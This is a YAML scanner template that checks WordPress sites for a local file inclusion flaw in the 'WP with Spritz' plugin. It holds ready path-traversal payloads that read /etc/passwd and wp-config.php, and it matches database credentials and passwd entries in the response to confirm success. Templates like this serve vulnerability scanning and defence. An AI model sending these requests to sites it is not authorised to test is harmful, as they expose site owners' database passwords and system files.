id: wordpress-with-spritz-lfi
info:
  name: Wordpress With Spritz LFI
  risk: High
  confidence: Certain

params:
  - root: '{{.BaseURL}}'

replicate:
  prefixes: 'blog, news, docs'

variables:
  - vul: |
      wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
      wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../wp-config.php
      
requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/{{.vul}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", 'DB_USER') && StringSearch("response", 'DB_PASSWORD')
      - >-
        StatusCode() == 200 && StringSearch("response", 'root:') && StringSearch("response", 'bin:x:')
  
references:
  - link: https://www.exploit-db.com/exploits/44544
